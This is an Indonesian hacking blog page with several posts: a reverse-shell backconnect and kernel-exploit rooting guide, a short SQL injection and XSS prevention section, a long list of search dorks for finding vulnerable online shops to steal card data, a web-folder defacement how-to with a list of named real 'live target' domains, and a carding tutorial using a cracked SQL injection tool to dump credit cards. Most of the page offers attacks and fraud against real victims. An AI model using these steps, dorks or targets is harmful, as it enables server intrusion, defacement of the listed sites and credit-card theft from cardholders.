Rabu, 29 Oktober 2014

SQL Power Injection

Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer atau server website di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.
SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:






banyak hacker bangladesh menggunakan SQL Power Inject ini karna sangat akurat dan sangat efektif bahkan Havj Pro gak bisa menandingi SQLi ini 

Download

Tutorial Backconnect

Backconnect Adalah Teknik Awal Untuk rooting Server
Bahan-Bahan :
 
-VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial )
-Putty (Download Disini )
-Shell Yang Sudah Tertanam Di Web 

Langkah-Langkah
 
1).Buka Putty Lalu Masukan IP VPS Kamu Trus Klik Open
 


2).Lalu masukan User Dan Password VPS Kalo Succes Login Akan Seperti Ini 


3).Sekarang Kita Masukaan Command nc -lvp [port] contoh ; nc -lvp 2802 Saya Sarankan Menggunakan port 443 Lalu Tekan Enter


4).Lalu Kita Ke Shell Dan Masukan IP VPS Trus Port Lalu Klik Connect 

5).Kalo Sudah Connect Akan Seperti Ini Sekarng Terserh Mau Di Apain


Tutorial R00t Server

Bahan - Bahan :

- VPS
- Putty For Windows
- Web Yang Sudah Tertanam Shell
- Exploit Kernel :D


Langkah - Langkah :

1.Backconnect dulu untuk tutor backconnect bisa di tonton > disini <



2.Setelah Di Backconnect Akan Keluar Kernelnya Lalu Kita Search google
  ~> Exploit Kernel [kernel web] contoh :
  ~> Exploit Kernel 2.6.32




3.Setelah Menemukan Upload Exploit Ke Web


4.Kita Kembali Ke putty Lagi Ganti chmodnya menjadi 777 dengan cara :
  ~> "chmod +x namafile"
  ~> "chmod 777 namafile"



5.Tinggal Kita Excute dengan cara "./namafile" Contoh "./xxx"



6.Coba Ketik id Jika Keluar
  ~> uid=0(root) gid=0(root) groups=0(root) Berarti Succes Jika Error Berarti Kernel Kurang        Pas :D


Gak mudeng? langsung tonton videonya 

Mencegah Website dari Serangan SQQL Injection & XSS

1 . Mencegah web dari SQL injection

SQL Injection
? Apa itu? Ya, beberapa dari kita para developer web sudah mendengar hal ini, bahkan seorang yang bukan developer web pun juga mengetahuinya. SQL Injection merupakan salah satu teknik serangan terhadap sebuah situs atau website. Serangan ini memanfaatkan kesalahan perintah SQL yang dikirimkan dari web ke database server untuk dieksekusi oleh databaseserver. 


Pada umumnya sintak SQL yang sering dipakai pada proses developing atau pembuatan sebuah situs iyalah sintak DML(Data Manipualtion Language) yakni INSERT, UPDATE danDELETEPada umumnya sintak yang dikirim seperti ini 

select * from `tblBerita` where `id` = 10
10 didapat dari hasil parsing parameter url
http://www.website.com/index.php?id=10
 
 
maka pada penulisan sintak php akan menjadi seperti ini

$SQL="select * from `tblBerita` where `id` = '".$_GET['id']."'";
pada proses eksekusi normal sintak tersebut, database server akan memberikan balikan hasil sesuai yang parameter yang dikirimkan. Namun bila kita meracuni parameter yang dikirim melalu url dengan sebuah karakter khusus yaitu single quote ( ' ) seperti ini 
http://www.website.com/index.php?id=10'
maka SQL query tersebut tidak akan bisa di eksekusi dan database server akan memberikan balikan berupa pesan error seperti berikut

 #1064 - You have an error in your SQL syntax; check the manual that corresponds 
to yourMySQL server version for the right syntax to use near ''' at line 1
mengapa? karena SQL yang dikirimkan ke database adalah seperti ini 

select * from `tblBerita` where `id` ='10''
perhatikan setelah nilai 10 terdapat dua buah single quote. Hal ini lah yang menyebabkan error, dan hal ini lah yang mejadi celah sebuah situs dan dengan mudah di eksploitasi dengan metode SQL Injection. 

Nah, bagaimana kita mengatasi hal ini? Ya, caranya adalah dengan melakukan sanitasi pada data yang dikirimkan dari url. 

PHP sendiri telah menyediakan method khusus untuk menangani hal ini, yaitumysql_real_escape atau mysql_real_escape_stringNamun kita juga bisa membuat sebuah method khusus untuk mengerjakan hal ini, yang penting tujuannya adalah untuk sanitasi data yang dikirimkan.

Saat penggunakan method itu maka sintak pengiriman SQL Query ke database server akan menjadi seperti ini
$SQL="select * from `tblBerita` where `id` = '".mysql_real_escape_string($_GET['id'])."'";
dan querynya akan mejadi seperti ini bila ada penambahan single quote pada url
select * from `tblBerita` where `id`='10'\'
dengan demikian, database hanya akan membaca 1 singel quote didepan angka 10 dan 1 single quote dibelakang angka 10, sedangkan 1 karakter single quote tambahan dibelakang angka 10 akan terabaikan karena adanya karakter back slash ( \ )
Demikianlah tutorial singkat dari saya mengenai Proteksi Website dari Serangan SQL Injection.
regards

2 . Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.


Cara Mengatasi Serangan XSS 

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Dikutip dari Wikipedia


Disini saya hanya menerangkan tempat dimana XSS dapat dilakukan

XSS yang paling banyak digunakan adalah jenis GET dan POST.
Salah satu contoh yang akan dibahas adalah jenis GET.

Lihat gambar dibawah ini :
image
Masukkan script alert sederhana ini pada URL yang mempunyai request GET
http://localhost/Momonimo/search?search_key=<script>alert('XSS TRUE')</script>

Jika halaman tersebut (yang mempunyai database) dapat melakukan XSS, maka akan tampil alert seperti gambar sebagai berikut :
image


Mengatasi XSS
---------------------------------------------------
PHP sangat handal dalam melakukan konversi string dengan cepat. Tetapi jenis apa yang akan anda lakukan jika hal diatas terjadi?

Saya melakukan survey terhadap teman-teman programmer.
Tidak sedikit yang menjawab "Pakai saja htmlentities() atau strip_tags()"

htmlentities() memang dapat melakukan konversi tag-tag HTML, tetapi bagaimana dengan Javascript?

strip_tags() memang dapat melakukan konversi tag-tag HTML dan PHP dengan NULL byte, tetapi bagaimana dengan Javascript?

Lalu apa yang harus dilakukan?
Saya memakai filter_var() dengan tipe filter Sanitize
Caranya sebagai berikut :

filter_var($val, FILTER_SANITIZE_STRING);

Dan hasilnya adalah :
image

Berikut adalah Fungsi untuk keseluruhannya :

function xss_filter($val) {
 $val = htmlentities($val); 
 $val = strip_tags($val);
 $val  = filter_var($val, FILTER_SANITIZE_STRING);
 
 return $val;
}


Saya membuat Fungsi diatas (dengan menambahkan htmlentities dan strip_tags) agar XSS key yang digunakan dapat terbaca semua. Semata-mata hanya ingin membuat rasa penasaran para hacker

Dork untuk Carding Terbaru

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Buy Now"
inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?categoryid=" intext:"Toys"
inurl:".php?pid="
inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?pid=" intext:"toys"
inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?prodid=" intext:"/shop/"
inurl:".php?prodid=" intext:"toys"
inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?productid=" intext:"/store/"
inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"
inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"boutique"
inurl:".php?product=" intext:"/store/"
inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"
inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"boutique"
inurl:".php?products=" intext:"/store/"
inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"
inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/store/"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?proid=" intext:"toys"
inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"
inurl:".php?itemid="
inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"
inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"
inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?catalogId=" intext:"View cart"
inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"
inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?aid=" intext:"/store/"
inurl:".php?aid=" intext:"toys"
inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"
inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
inurl:".php?articleid=" intext:"add to cart"
inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"

Deface Dengan Teknik Web-Folder di Windows 7

  1. Persiapkan halaman Script defacement Anda, contoh :l hacked.html 
  2. Buka window explorer   
  3. Kemudian di dalam tampilan windows explorer klik kanan dan pilih Add a network Location
     
     
  4. Selanjutnya klik nekt  Pada Internet or network addres, masukkan alamat website target Anda! misal target Anda adalah http://yourtarget.com/ 
  5. klik nekt dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu. 
  6. Selanjutnya memberikan nama web folder tersebut, klik nekt saja langsung karena secara otomatis akan memberikan nama sesuai alamat website tsb.
  7. klik finish dan web folder tersebut akan muncul di windows explorer Anda.  
  8. Langkah selanjutnya masukkan halaman defacement Anda yang sebelumnya sudah dipersiapkan, misal deface.html ke dalam web folder yang telah dibuat tadi. htm
  9. Untuk membuka hasil deface Anda tersebut tinggal menambahkan nama file defacement Anda dibelakang url website tsb. Misal: http://yourtarget.com/ menjadi http://yourtarget.com/deface.htm

    Live target

    zgsfjw.net
    centro.anje.pt
    www.ziangli.com 
    6.shicheng.gov.cn
    www.ville-mordelles.fr 
    www.podiocom.com 
    www.journeezerotracas.fr 
    www.journeezerotracas.com 
    www.journee0tracas.com 
    www.comune.torrice.fr.it 
    www.chinamaster88.com 
    www.chateaudelepinay.fr 
    www.centroformazioneitalia.it 
    www.bjautoobd.com 
    www.autodiagtool.com 
    usa.automotormaster.com
    so-sighty.fr
    perros-guirec.icor.fr
    myhealthcity.com
    malaysiahealthcareindonesia.com
    lapetitehublais.fr
    handistar.fr
    gz.autoobd-ii.com
    gz.automotormaster.com
    expert-comptable-35.fr
    carrelages-palmieri.com
    camion-road-show.com
    autoobd.cn
    hibis.co.id

Tutorial Carding

Selamat sore :) Selamat Datang Kembali di Blog Hanafi gimana kabar kalian di sore ini ? Semoga baik-baik saja ya, Pada kesempatan yang satu ini saya akan menulis artikel yang berhubungan tentang carding yaitu artikel yang bernama ” Tutorial Cara Carding Untuk Pemula ” silahkan dibaca dan semoga bermanfaat untuk anda.
Sebelumnya pasti sudah pada tahukan pengertian dari carding itu sendiri ? Bagi yang belum tahu saya akan sedikit memperjelas dan memberitahu terlebih dahulu pengertian atau definisi dari carding itu.
Apasih Carding itu? Carding ialah suatu kegiatan penyalahgunaan data pada kartu kredit online maupun kartu kredit online yang biasa dgunakan oleh carder (sang pelaku carding) yang sangat tak bertanggung jawab untuk berbelanja secara online dengan memakai kartu kredit yang dimiliki oleh orang lain dengan cara yang ilegal. Sebetulnya Cara melakukan carding lumayan mudah membuat teknik ini kerab ditemui di tahun 2001 hingga sekarang ini. Seseorang pelaku ini (pelaku carding/carder) tak memerlukan mencuri sebuah kartu kredit yang dimiliki orang lain tersebut untuk dipakai di dalam melakukan pembayaran di internet. Suatu pembayaran atau transaksi kartu kredit di internet hanya dilakukan dengan cara menginput suatu nomor kartu kredit beserta dengan password atau nomor rahasianya yang seringkali berasal dari 3 atau 4 digit di belakang kartu kredit tersebut. Sudah sangat jelas bahwasannya di Peraturan UU ITE Yang dibuat oleh keamanan cyber menyatakan bahwa tindakan mencuri dan merusak sangat dilarang dan akan dihukum sampai kepada hukuman pidana penjara. Akan tetapi masih saja ada oknum-oknum yang melakukan carding untuk mencari keuntungan sendiri, Di jejaring sosial sendiri juga sudah banyak para carder (Pelaku Carding) yang memperjualbelikan kartu kredit hasil cardingan tersebut. Sebaiknya anda jadikan tutorial dan cara yang saya berikan ini menjadi pelajaran semata dan bukan untuk dipraktekkan, Walau bagaimanapun tindakan carding ini sangat amat merugikan untuk si korban yang kartu kredit nya anda retas. Saya memberikan tutorial ini hanya untuk pembelajaran semata bukan untuk merusak, segala tindakan perusakan bukan tanggung jawab saya melainkan tanggung jawab diri anda sendiri.
Selanjutnya saya akan memberitahu dulu kepada anda yang mempunyai kartu kredit agar terhindar dari aksi carding ini, Berikut tips dari saya :
- Jangan Memakai Wifi atau Wireless yang ada di tempat umum untuk melakukan transaksi atau pembayaran online menggunakan kartu kredit atau paypal. (Saya sarankan jangan pernah bertransaksi menggunakan Wifi)
- Selalu Hapus Cache dan Cookie browser di Komputer anda setelah melakukan transaksi online, Hal ini dikarenakan jika anda tidak menghapus Cache dan Cookie anda setelah bertransaksi maka jika ada orang setelah anda yang memakai komputer anda, dia juga bisa melakukan transaksi secara online menggunakan kartu kredit yang anda miliki.
- Selalu Rahasiakan Nomor Kartu Kredit beserta Nomor Rahasia Kartu Kredit Anda, Mengapa harus dirahasiakan? Karena jika anda menyebarkan kepada orang lain nomor kartu kredit anda maka akan berdampak fatal untuk anda, karena orang yang mengetahui nomor kartu kredit anda bisa saja dia berniat jahat kepada anda dan meretas kartu kredit anda lalu dia memakai kartu kredit anda untuk kepentingan dia sendiri.
- Jangan sampai ada Keylogger di Komputer yang anda pakai, Jika anda melakukan transaksi atau pembayaran online di Warnet atau warung internet, Anda harus memastikan tidak ada program maupun aplikasi keylogger yang terdapat di dalam komputer tersebut, Jika ada saya sarankan untuk anda agar tidak melakukan transaksi di warnet tersebut. Karena jika ada dan anda masih melakukan transaksi online nya. Maka data-data kartu kredit anda akan diketahui oleh si pemasang program keylogger tersebut.
- Jangan Simpan Formulir hasil bertransaksi dari ATM, Sebaiknya jika anda telah menarik atau menabung uang pada mesin atm. ada bagusnya anda merobek atau memusnahkan formulir atau struk hasil bertransaksi tersebut, untuk menghindari penyalahgunaan.
- Berhati-hatilah terhadap situs palsu atau Fake SIte, Metode ini dinamakan Phising, berhati-hati jika anda melakukan transaksi online pada situs yang belum diketahui asal-usulnya karena bisa jadi situs itu situs palsu dan kartu kredit anda bisa diretas oleh si pemilik situs.
- Selalu Cek Data Kartu Kredit Anda Secara Rutin dan Teratur, Untuk menghindari adanya transaksi gelap yang anda tidak ketahui yang menggunakan kartu kredit anda. Jika hal ini terjadi, Laporkan hal ini pada pihak keamanan yang berwajib.
- Jangan Pernah Memberikan Kartu Kredit anda kepada orang lain, Sudah jelas jika anda memberikan kartu kredit anda kepada orang lain apalagi orang yang tidak anda kenal akan membuat kartu kredit anda dipakai oleh orang tersebut.
Itulah tadi 7 cara dan tips dari saya untuk mencegah kartu kredit anda diretas dan disalahgunakan oleh orang lain. Sekarang saya akan kembali ke topik pembicaraan kita yaitu Bagaimana Cara Carding Paypal atau Carding Kartu Kredit. Lanjut baca dibawah ini.
Banyak para carder yang membagikan aplikasi-aplikasi cardingnya yang tersebar di Internet, namun setelah saya mencobanya satu persatu hampir banyak sekali yang tidak berfungsi. Namun saya mempunyai Aplikasi Carding yaitu Havij. Havij mungkin sudah tidak asing lagi terdengar di telinga para carder sejati Havij adalah salah satu software yang lumayan ampuh untuk melakukan aksi carding ini. Penggunaan Aplikasi Havij ini memang Susah Susah Gampang, Tergantung seberapa antusias anda di dalam mempelajarinya. Saya akan membagikan secara gratis untuk para pengunjung dan sahabat setia Blog Taufiq Rahman :)
Saya akan membagikan Havij yang Pro Full Crack, yang sudah di crack dan anda tinggal menggunakannya saja. Pertama DOWNLOAD HAVIJ Via DataFileHost AtauDOWNLOAD HAVIJ Via 4Shared  Atau Bisa Juga DOWNLOAD HAVIJ Via FileHost . silahkan buka di browser anda teks biru yang tadi dan download aplikasinya di teks biru tersebut. Lalu siapkan alat-alat pendukung lainnya dibawah ini :
- Komputer / PC
- Modem Yang Aktif untuk koneksi internet nya.
- Secangkir Kopi / Teh Hangat untuk penambah semangat :D
- Siapkan Dork Vuln Yang Ingin Di Eksekusi.
- Siapkan Antusias beserta kesabaran anda. Karena jika anda tidak sabaran maka tidak akan berguna, INGAT Semua itu butuh proses dan ketelitian.
Lalu jika alat-alat pendukung diatas telah siap kita lanjut ke cara memakai aplikasinya. Berikut Proses Dan Cara Memakai Serta Mengeksekusinya :
- Download Dan Install Aplikasi Havij nya di Komputermu.
- Cari Dork Vuln Web yang menyimpan Credit Card atau Paypal di Mesin pencari Google.
- Buka salah satu web yang ditemukan dari sekian pencarian di Google Lalu Tambahkan Tanda Kutip 1 ( ‘ ) Di akhiran URL Website nya. Hal ini untuk mengetahui Apakah Web yang akan di eksekusi Vuln atau tidak.
Jika Hasilnya web memunculkan pesan ” ERROR ” maka tandanya web itu bisa di crack kartu kredit yang terdapat didalam database nya.
Carding Hack Logo

- Masukkan Link Web yang tadi, Yang menyimpan Credit Cardnya kedalam Havij.
- Lalu Setelah itu anda klik “Analyze” Yang terdapat pada aplikasi Havij nya. Cari Link Sub nya yang ada disitu hingga berwarna Hijau Havij nya, Jika masih berwarna merah maka cari link yang lain yang ada di Havij itu hingga Havij nya berwarna Hijau
- klik 2x File Aplikasi Havij nya.
- Klik Register
- Masukan Di Kolom Username nya yaitu : ‘ Cracked.By.Taufiq371.ws ‘ atau anda masukkan Username nya ‘ Cracked.By.Exidious_For_Opensc.ws ‘
- Lalu jika anda telah memasukkan salah satu username diatas setelah itu anda Klik ‘ Browse ‘ Di Aplikasi nya dan Tunggu Proses Selanjutnya.
- Lalu masukkan Link Web yang Vuln yang terdapat di Google kedalam Havijnya. Dan Anda Tinggal gunakan kemampuan anda untuk mengeksekusi kartu kreditnya.
- Lalu Liat Hasil Dari Kartu kreditnya di Havij tersebut.
Anda juga bisa melakukan metode Cara Carding Paypal dengan Aplikasi Havij ini.
Sekian dari saya untuk tutorial penggunaan Havij untuk carding kali ini. Ingat Tutorial Diatas Hanya Untuk Pengetahuan Dan Pembelajaran Semata bukan untuk penggunaan TIndakan merusak. Segala Tindakan Perusakan Akan Berurusan Dengan Pihak Yang Berwajib. Dan tanggung jawab anda semata. Saya tidak bertanggung jawab :)
Semoga tutorial diatas dijadikan sebagai pembelajaran ya, Dan Semoga Tutorial Diatas bermanfaat ya :)
Jika ada yang belum dipahami atau belum diketahui silahkan berkomentar. Lihat Daftar Artikel yang menarik lainnya di Daftar Isi BLOG
Terimakasih telah membaca artikel ini :)
” Jadilah Seorang Blogger Yang Kreatif, Jangan Jadi Tukang Salin Artikel orang. Dilarang Menyalin Artikel ini. Artikel ini Dilindungi Oleh Hak Cipta Dan Semua Konten Di Blog Ini Dilindungi Oleh Pihak DMCA.”

Postingan Lebih Baru Postingan Lama Beranda